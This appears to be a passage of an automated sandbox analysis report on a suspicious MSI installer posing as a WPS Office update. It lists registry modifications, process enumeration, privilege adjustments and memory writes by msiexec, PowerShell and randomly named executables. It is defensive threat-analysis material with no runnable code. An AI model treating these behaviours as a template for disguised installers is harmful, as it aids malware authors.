Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\system32\vssvc.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Kingsoft\Office\6.0\Common\khdinfo\InfoLastHardInfo C:\Program Files\TransformOptimisticContributor\wpsupdate.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Kingsoft\Office\6.0\Common\InfoHDt = "19" C:\Program Files\TransformOptimisticContributor\wpsupdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software C:\Windows\System32\WScript.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software C:\Program Files\TransformOptimisticContributor\wpsupdate.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\System32\MsiExec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Kingsoft C:\Program Files\TransformOptimisticContributor\wpsupdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Kingsoft\Office\6.0\Common\InfoHD3Verify_C = 32003000320034002d00310031002d00310039007c00570044004300200032002e0035002b00320033003200310033003800380030003400310036003500200020002000200020002000200020007c00430036002d00370030002d00390030002d00440044002d00310035002d00390039000000 C:\Program Files\TransformOptimisticContributor\wpsupdate.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Kingsoft\Office\6.0\Common\khdinfo\InfoCurHardInfo = "29a56b8a14940c3acb7a4a6443907c56|55963946ec73b9e1d4c0264c2c6a0401" C:\Program Files\TransformOptimisticContributor\wpsupdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Kingsoft\Office C:\Program Files\TransformOptimisticContributor\wpsupdate.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script\Settings\JITDebug = "0" C:\Windows\System32\MsiExec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\WScript.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script\Settings C:\Windows\System32\MsiExec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Kingsoft\Office\6.0\Common\InfoHD3_C = "e1c88404c6b9f73bfc8d61a168abb5a4" C:\Program Files\TransformOptimisticContributor\wpsupdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Kingsoft\Office\6.0\Common\khdinfo C:\Program Files\TransformOptimisticContributor\wpsupdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Kingsoft\Office\6.0\Common\khdinfo\InfoHDModifiedType = "hdidRecalByOldHdidFromRegIsEmpty|2024-11-19" C:\Program Files\TransformOptimisticContributor\wpsupdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft C:\Windows\System32\WScript.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Kingsoft\Office\6.0\Common\InfoHD = "e1c88404c6b9f73bfc8d61a168abb5a4" C:\Program Files\TransformOptimisticContributor\wpsupdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\MsiExec.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\System32\MsiExec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Kingsoft\Office\6.0 C:\Program Files\TransformOptimisticContributor\wpsupdate.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Kingsoft\Office\6.0\Common\InfoHD3t = "19" C:\Program Files\TransformOptimisticContributor\wpsupdate.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\System32\MsiExec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections C:\Program Files\TransformOptimisticContributor\wpsupdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings C:\Windows\System32\WScript.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Kingsoft\Office\6.0\Common C:\Program Files\TransformOptimisticContributor\wpsupdate.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\System32\MsiExec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\0FEBA7E590D91C9459F27EF33A43D970\Version = "100859912" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\0FEBA7E590D91C9459F27EF33A43D970\AuthorizedLUAApp = "0" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\0FEBA7E590D91C9459F27EF33A43D970\SourceList C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\0FEBA7E590D91C9459F27EF33A43D970\SourceList\PackageName = "wpsupdate.msi" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\0FEBA7E590D91C9459F27EF33A43D970\SourceList\Media C:\Windows\system32\msiexec.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\0FEBA7E590D91C9459F27EF33A43D970\Clients = 3a0000000000 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\0FEBA7E590D91C9459F27EF33A43D970 C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\0FEBA7E590D91C9459F27EF33A43D970\Language = "1033" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\0FEBA7E590D91C9459F27EF33A43D970\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\0FEBA7E590D91C9459F27EF33A43D970\Assignment = "1" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\0FEBA7E590D91C9459F27EF33A43D970\AdvertiseFlags = "388" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\0FEBA7E590D91C9459F27EF33A43D970\DeploymentFlags = "3" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\ED4346F32F1F8CA46B2D014BA47DCC9B C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\0FEBA7E590D91C9459F27EF33A43D970\SourceList\Net C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\0FEBA7E590D91C9459F27EF33A43D970 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\0FEBA7E590D91C9459F27EF33A43D970\ProductName = "TransformOptimisticContributor" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\0FEBA7E590D91C9459F27EF33A43D970\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\0FEBA7E590D91C9459F27EF33A43D970\SourceList\Media\1 = ";" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\0FEBA7E590D91C9459F27EF33A43D970\ProductFeature C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\0FEBA7E590D91C9459F27EF33A43D970\PackageCode = "CCD296EAB4068834AB0FC3DB62EF5779" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\0FEBA7E590D91C9459F27EF33A43D970\InstanceType = "0" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\ED4346F32F1F8CA46B2D014BA47DCC9B\0FEBA7E590D91C9459F27EF33A43D970 C:\Windows\system32\msiexec.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files\TransformOptimisticContributor\wpsupdate.exe N/A
N/A N/A C:\Program Files\TransformOptimisticContributor\wpsupdate.exe N/A
N/A N/A C:\Program Files\TransformOptimisticContributor\wpsupdate.exe N/A
N/A N/A C:\Program Files\TransformOptimisticContributor\wpsupdate.exe N/A
N/A N/A C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe N/A
N/A N/A C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe N/A
N/A N/A C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe N/A
N/A N/A C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe N/A
N/A N/A C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe N/A
N/A N/A C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe N/A
N/A N/A C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe N/A
N/A N/A C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe N/A
N/A N/A C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe N/A
N/A N/A C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe N/A
N/A N/A C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe N/A
N/A N/A C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe N/A
N/A N/A C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe N/A
N/A N/A C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe N/A
N/A N/A C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe N/A
N/A N/A C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe N/A
N/A N/A C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe N/A
N/A N/A C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe N/A
N/A N/A C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe N/A
N/A N/A C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe N/A
N/A N/A C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe N/A
N/A N/A C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe N/A
N/A N/A C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe N/A
N/A N/A C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe N/A
N/A N/A C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe N/A
N/A N/A C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe N/A
N/A N/A C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe N/A
N/A N/A C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe N/A
N/A N/A C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe N/A
N/A N/A C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe N/A
N/A N/A C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe N/A
N/A N/A C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe N/A
N/A N/A C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe N/A
N/A N/A C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe N/A
N/A N/A C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe N/A
N/A N/A C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe N/A
N/A N/A C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe N/A
N/A N/A C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe N/A
N/A N/A C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe N/A
N/A N/A C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe N/A
N/A N/A C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe N/A
N/A N/A C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe N/A
N/A N/A C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe N/A
N/A N/A C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe N/A
N/A N/A C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe N/A
N/A N/A C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe N/A
N/A N/A C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe N/A
N/A N/A C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe N/A
N/A N/A C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe N/A
N/A N/A C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe N/A
N/A N/A C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe N/A
N/A N/A C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe N/A
N/A N/A C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe N/A
N/A N/A C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe N/A
N/A N/A C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeImpersonatePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe N/A
Token: 35 N/A C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe N/A
Token: SeRestorePrivilege N/A C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe N/A
Token: 35 N/A C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 716 wrote to memory of 3600 N/A C:\Windows\system32\msiexec.exe C:\Windows\system32\srtasks.exe
PID 716 wrote to memory of 3600 N/A C:\Windows\system32\msiexec.exe C:\Windows\system32\srtasks.exe
PID 716 wrote to memory of 2580 N/A C:\Windows\system32\msiexec.exe C:\Windows\System32\MsiExec.exe
PID 716 wrote to memory of 2580 N/A C:\Windows\system32\msiexec.exe C:\Windows\System32\MsiExec.exe
PID 2580 wrote to memory of 1788 N/A C:\Windows\System32\MsiExec.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2580 wrote to memory of 1788 N/A C:\Windows\System32\MsiExec.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2580 wrote to memory of 4232 N/A C:\Windows\System32\MsiExec.exe C:\Windows\System32\cmd.exe
PID 2580 wrote to memory of 4232 N/A C:\Windows\System32\MsiExec.exe C:\Windows\System32\cmd.exe
PID 4232 wrote to memory of 3840 N/A C:\Windows\System32\cmd.exe C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe
PID 4232 wrote to memory of 3840 N/A C:\Windows\System32\cmd.exe C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe
PID 4232 wrote to memory of 3840 N/A C:\Windows\System32\cmd.exe C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe
PID 4232 wrote to memory of 2964 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 4232 wrote to memory of 2964 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 4232 wrote to memory of 2808 N/A C:\Windows\System32\cmd.exe C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe
PID 4232 wrote to memory of 2808 N/A C:\Windows\System32\cmd.exe C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe
PID 4232 wrote to memory of 2808 N/A C:\Windows\System32\cmd.exe C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe
PID 2580 wrote to memory of 3400 N/A C:\Windows\System32\MsiExec.exe C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe
PID 2580 wrote to memory of 3400 N/A C:\Windows\System32\MsiExec.exe C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe
PID 2580 wrote to memory of 3400 N/A C:\Windows\System32\MsiExec.exe C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe
PID 2580 wrote to memory of 4840 N/A C:\Windows\System32\MsiExec.exe C:\Program Files\TransformOptimisticContributor\wpsupdate.exe
PID 2580 wrote to memory of 4840 N/A C:\Windows\System32\MsiExec.exe C:\Program Files\TransformOptimisticContributor\wpsupdate.exe
PID 2580 wrote to memory of 4840 N/A C:\Windows\System32\MsiExec.exe C:\Program Files\TransformOptimisticContributor\wpsupdate.exe
PID 2372 wrote to memory of 3204 N/A C:\Program Files\TransformOptimisticContributor\nKecPJAaIeFB.exe C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe
